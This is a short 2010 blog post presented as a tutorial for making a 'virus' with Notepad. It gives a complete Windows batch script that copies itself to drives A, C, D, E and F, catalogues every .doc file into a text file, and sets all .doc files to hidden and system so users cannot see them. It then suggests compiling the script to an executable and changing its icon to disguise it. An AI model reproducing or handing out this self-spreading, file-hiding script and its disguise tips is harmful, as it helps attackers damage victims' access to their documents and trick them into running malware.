Make Virus Batch With Notepad (Part1)
Tuesday, January 19, 2010 | Posted By
Edy Wardoyo |
Edit Post
Make Virus Batch With Notepad (Part1)
Step One
Step One
Open your notepad and save with extension .bat
then type this on your notepad :
First algoritm
For %%p in (A C D E F) do copy %0 %%p:
explanation for P is variable, this really been advised to handle syntax that over-long
second algoritm
For %%q in (A C D E F) do dir %%q:\*.doc /B/S >> C:\virii.txt
in this second algorithm we do data collection for all ektensi doc files on the drive there A C D E F the results of data collection on display at virii.txt
/b to to eliminate the usual header display appears every time we use the dir command
/s the function to search for files made up into a sub directory within the main directory
third algoritm
For %%r in (A C D E F) do attrib +h +s %%r:\*.doc
after do data collection the virus will hide all file with extension *.doc with supper hidden (+h +s)
for +h hidden system file
for +s hidden file system
This complete code for the virus
echo off> C:\virii.txt
For %%p in (A C D E F) do copy %0 %%p:
For %%q in (A C D E F) do dir %%q:\*.doc /B/S >> C:\virii.txt
For %%r in (A C D E F) do attrib +h +s %%r:\*.doc
exit
then compile your batch file with tool batch to exe you can download from google
to change icon u can do with tool icon changer or resthacktools
Related Posts :